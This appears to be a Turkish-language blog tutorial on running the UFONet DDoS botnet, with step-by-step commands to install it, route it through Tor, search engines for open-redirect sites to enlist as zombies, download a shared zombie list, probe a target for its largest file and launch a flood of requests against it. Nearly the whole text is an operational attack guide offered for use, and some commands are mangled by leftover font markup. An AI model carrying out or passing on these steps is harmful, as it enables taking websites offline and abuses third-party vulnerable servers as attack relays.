Ufonet DDOS Botnet kullanımı

1. KAYNAĞA ERİŞİM
Her şeyden önce Kali Linux kullanmak avantaj olacaktır. İlk adımımız UFONet’e erişmek, terminali açıyoruz:
git clone face=Courier New, Courier, monohttps://github.com/epsylon/ufonet/LILIcd ufonet


Bunu çalıştırmak için tüm değişkenlere sahip olduğumuzdan emin olmamız gerek. Python 2.7.9 ve üzerindeki versiyonlara, python-pycurl ve python-geoip’e ihtiyacımız olacak. Kali Linux gibi Debian tabanlı bir sisteme bunları kurmak için şu komutu çalıştırın:
sudo apt-get install python-pycurl python-geoip
Ardından UFONet’i güncelliyoruz:
./ufonet –update

2. TOR’U YAPILANDIRIN (İSTEĞE BAĞLI)
TOR’u kurduktan sonra terminale şu kodu yazıyoruz:
./ufonet –check-tor
3. SAVUNMASIZ HOST BULMAK
Savunmasız hostları bulmak için arama fonksiyonunu kullanacağız. UFONet savunmasız host bulmak için varsayılan olarak yalnızca Bing’i kullanır. Bunu değiştirebilirsiniz. Biz mümkün olan tüm arama motorlarını kullanacağız.
./ufonet -s ’proxy.php?url=’ –sa
Bu komut UFOnet’e -yerleşik tüm arama motorlarını kullanarak- “proxy.php?url=” içeren tüm siteleri aramasını söyler. “proxy.php?url=”  içeren siteler yönlendirmelere karşı zafiyet barındırabilir. İsterseniz şu komut ile bir text dosyası kullanarak arama dizileri yükleyebilirsiniz.
[FONT=Courier]./ufonet –sd ’botnet/dorks.txt’[/FONT]

Resimdeki sitelere herhangi bir zarar verilmemiş olup sadece deneme amacıyla gösterilmektedir. “YES” komutu kullanıldığı takdirde UFONet mevcut sitelerdeki zafiyetleri kontrol edecektir.
UFONet topluluğunun zombi dosyası şu komut ile indirilebilir:
./ufonet –download-zombies


4. TEST AŞAMASI
Şimdi elimizde kullanabileceğimiz zombiler var (botnet/zombies.txt). UFOnet verileri savunmasız hostlarda “botnet” klasöründe text formatında saklar. Her text dosyasının konulu bir adı vardır ve Open Redirect’in farklı bir formunu temsil eder.


5. HEDEFİ DENETLEMEK
Hedefi şu komutla sorgulayabiliriz:
./ufonet -i face=Courier New, Courier, monohttp://192.168.1.97
Büyük dosyalara odaklanmak gerekmeyebilir, hedef sitenin biraz fazla bandwidth harcamasına neden olur.


En büyük dosyanın “ubuntu-logo.png” olduğu tespit edildi. (Bu resimde konuyu çevirdiğim yabancı sitedeki şahsın kendi sitesinde yaptığı denemeyi görüyoruz.) Burada UFONet’in sitedeki harici bir linki takip ettiğini ve hedeften saptığını görüyoruz. Araçların hata yapabildiğini göz önünde bulundurup dikkatli davranmamız gerekiyor.

./ufonet -a http://192.168.1.97 -r 10 -b”icons/ubuntu-logo.png”

6. SALDIRI BAŞLATMAK

Bu komutla UFONet’i başlatıyoruz, -a saldıracağımız hedefi, -r her hostun kaç kez saldıracağını, -b hedefin neresine talepte bulunacağımızı göstermekte.


Bu komutu çalıştırdığımızda UFONet hedefe her zombi ile 10 kez saldıracak. Eğer 100 zombi ile 10’ar kez saldırırsanız toplamda 1000 talepte bulunmuş olursunuz. Biz bu şekilde özellikle sitedeki en büyük dosya olan “ubuntu-logo.png” dosyasına talepte bulunuyoruz. Sayı küçük görünebilir ama hatrı sayılır bir DDoS saldırısı yapabilirsiniz.


Saldırı başarılı olduğunda ekranda başardığınıza dair bir mesaj gelecek (CONGRATULATIONS!). Kendiniz kontrol etmek isterseniz isup.me gibi sitelerden sitenin durumunu görebilirsiniz.

 

 

WordPress.com'da ücretsiz bir web sitesi ya da blog oluşturun.

Yukarı ↑